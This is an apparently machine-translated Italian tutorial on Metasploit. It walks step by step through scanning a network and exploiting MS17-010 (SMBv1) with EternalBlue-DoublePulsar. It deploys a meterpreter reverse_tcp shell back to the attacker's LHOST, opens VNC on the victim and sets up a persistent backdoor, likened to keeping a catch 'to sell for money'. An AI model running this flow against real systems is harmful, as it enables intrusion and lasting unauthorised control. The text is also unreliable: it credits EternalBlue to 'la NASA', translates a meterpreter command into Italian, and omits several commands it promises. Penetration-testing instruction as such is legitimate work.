Esercitazione su Metasploit
Poiché abbiamo discusso dei TOP 25 MIGLIORI STRUMENTI KALI LINUX e abbiamo inserito METASPLOIT al primo posto nell'elenco, ora discutiamo e impariamo a conoscere METASPLOIT. Ti consigliamo di avere familiarità con Metasploit.
Metasploit inizialmente creato da H. D Moore nel 2003, fino a quando non è stato acquisito e sviluppato ulteriormente da Rapid7 il 21 ottobre 2009. Il framework Metasploit è completamente scritto utilizzando Ruby ed è un pacchetto standard installato nel sistema Kali Linux (e anche in quasi tutti sistema operativo Penetration Testing, immagino). È il kit preferito dagli hacker o dai penetration tester per ricercare le vulnerabilità della sicurezza, sviluppare ed eseguire exploit su obiettivi e altri sviluppi della sicurezza.
Metasploit viene fornito con diverse edizioni, generalmente divise in due categorie, versione gratuita e versione a pagamento. Le versioni gratuite: Metasploit Framework Community Edition (interfaccia basata su CLI) e Armitage (interfaccia basata su GUI). Le versioni a pagamento: Metasploit Express, Metasploit Pro e Cobalt Strike (è simile ad Armitage, fornito da Strategic Cyber LLC).
Metasploit consente agli utenti di creare (o sviluppare) il proprio codice di exploit, ma non preoccuparti se non sai come programmare, Metasploit ha tanti moduli e vengono continuamente aggiornati. Attualmente Metasploit conta oltre 1600 exploit e 500 payload. Il modo più semplice per capire cosa sono gli exploit e i payload, un exploit è fondamentalmente il modo in cui l'aggressore consegna il payload, attraverso il buco di vulnerabilità del sistema di destinazione. Una volta che l'aggressore lancia l'exploit che contiene un payload contro un bersaglio vulnerabile, quindi il payload viene distribuito (payload utilizzato per riconnettersi all'aggressore per ottenere l'accesso remoto al sistema bersaglio), in questa fase l'exploit viene eseguito e diventa irrilevante.
"Metasploit non è uno strumento istantaneo di hacking, è un framework folle"
Questo articolo di Metasploit riguarda l'esecuzione di test di penetrazione contro un sistema di destinazione utilizzando il seguente flusso:
Scansione delle vulnerabilità
Valutazione di vulnerabilità
Sfruttare
Ottenere l'accesso remoto: possedere il sistema
PREPARAZIONE
Assicurati che il nostro Kali Linux abbia l'ultima versione aggiornata. Ci saranno miglioramenti all'interno di ogni aggiornamento. Esegui i seguenti comandi:
~# apt upgrade -y
~# apt dist-upgrade -y
Una volta che la nostra macchina è aggiornata, ora iniziamo avviando la console metasploit. Nel terminale digitare:
Inoltre è necessario un editor di testo, Gedit o Leafpad, per raccogliere alcune informazioni lungo il percorso prima di compilare l'attacco. Innanzitutto, identifica il tuo indirizzo IP dell'interfaccia wireless, l'IP del router e la maschera di rete.
Sulla base delle informazioni di cui sopra annotiamo la WLAN1, l'indirizzo IP del router e la maschera di rete. Quindi, la nota dovrebbe assomigliare a questa:
IP dell'attaccante (LHOST): 192.168.1.56 IP del gateway/router: 192.168.1.1 Maschera di rete: 255.255.255.0(/24)
PASSO 1: SCANSIONE DELLA VULNERABILITÀ
Nella console metasploit, raccogliamo quindi innanzitutto informazioni, come l'indirizzo IP di destinazione, il sistema operativo, le porte aperte e la vulnerabilità. Metasploit ci consente di eseguire NMap direttamente dalla console. Sulla base delle informazioni di cui sopra, esegui questo comando per eseguire la nostra attività di raccolta delle informazioni.
msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O
Dal comando sopra abbiamo ottenuto il risultato seguente.
Abbiamo un obiettivo vulnerabile con sistema operativo Windows e il vulnerabile si trova sul servizio SMBv1. Quindi, aggiungi alla nota.
IP di destinazione (RHOST): 192.168.1.57 Vulnerabilità: vulnerabilità relativa all'esecuzione di codice in modalità remota nei server Microsoft SMBv1 (ms17-010)
FASE 2: VALUTAZIONE DELLA VULNERABILITÀ
Ora conosciamo l’obiettivo e la sua vulnerabilità. Controlliamo la vulnerabilità nella console metasploit
Ora conosciamo l’obiettivo e la sua vulnerabilità. Controlliamo la vulnerabilità nella console metasploit utilizzando il modulo ausiliario smb_scanner. Esegui il seguente comando:
msf auxiliary(smb_ms17_010) > set RHOSTS [target IP]
msf auxiliary(smb_ms17_010) > run
Metasploit è fiducioso riguardo alla vulnerabilità e mostra l'esatta edizione del sistema operativo Windows. Aggiungi alla nota:
Sistema operativo di destinazione: Windows 7 Ultimate 7600
PASSO 3: SFRUTTARE
Sfortunatamente, metasploit non ha alcun modulo di exploit relativo a questa vulnerabilità. Ma non preoccuparti, c’è un ragazzo esterno esposto e ha scritto il codice dell’exploit. L’exploit è familiare, poiché avviato dalla NASA si chiama EternalBlue-DoublePulsar. Puoi prenderlo da qui oppure seguire la guida dal video tutorial qui sotto per installare il codice dell'exploit sul tuo framework metasploit.
Dopo aver seguito la guida sopra (assicurati che il percorso sia lo stesso del tutorial). Ora sei pronto per sfruttare l'obiettivo. Esegui i seguenti comandi:
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56
Impresa
Boom... L'exploit è riuscito, abbiamo ottenuto la sessione di meterpreter. Come accennato in precedenza, una volta lanciato l'exploit verrà distribuito il payload, che in questo caso è windows/meterpreter/reverse_tcp.
PASSO 4: OTTENERE L'ACCESSO REMOTO
Esploriamo i comandi più disponibili, inserisci "?" (senza punto interrogativo) e vediamo i comandi disponibili elencati. I comandi di sistema Stdapi sono:
Per visualizzare ulteriori informazioni sul sistema di destinazione, utilizza il comando "sysinfo". L'output dovrebbe assomigliare a questo.
Poiché abbiamo effettuato l'iniezione nel processo di sistema in precedenza (spoolsv.exe), abbiamo ottenuto il privilegio di sistema. Possediamo l'obiettivo. Possiamo fare molto con il comando al bersaglio. Ad esempio potremmo eseguire RDP o semplicemente impostare il telecomando VNC. Per eseguire il servizio VNC, immettere il comando:
Il risultato dovrebbe essere il desktop della macchina di destinazione, simile a questo.
La parte più importante è creare una backdoor, quindi ogni volta che la macchina di destinazione si disconnette dalla nostra macchina, la macchina di destinazione proverà a riconnettersi, di nuovo a noi. Il backdooring viene utilizzato per mantenere l'accesso, è come pescare, non ributterai il pesce in acqua una volta preso il pesce, giusto? Vuoi fare qualcosa con il pesce, ad esempio conservarlo in frigorifero per ulteriori azioni, come cucinarlo o venderlo per denaro.
Meterpreter ha questa funzione di backdoor persistente. Esegui il comando seguente e dai un'occhiata ai parametri e agli argomenti disponibili.
meterpreter > esegui persistenza -h
Se non ti senti a tuo agio con questo script deprecato, il modulo di persistenza più recente si trova in post/windows/manage/persistence_exe. Puoi esplorarlo ulteriormente da solo.
Metasploit è enorme, non è solo uno strumento, è un framework, considera che ha oltre 1600 exploit e circa 500 payload. Un articolo è adatto al quadro generale dell'uso o dell'idea generale. Ma hai imparato così tanto da questo articolo.
"Più segui il flusso dell'attacco, più avrai sfide senza sforzo. "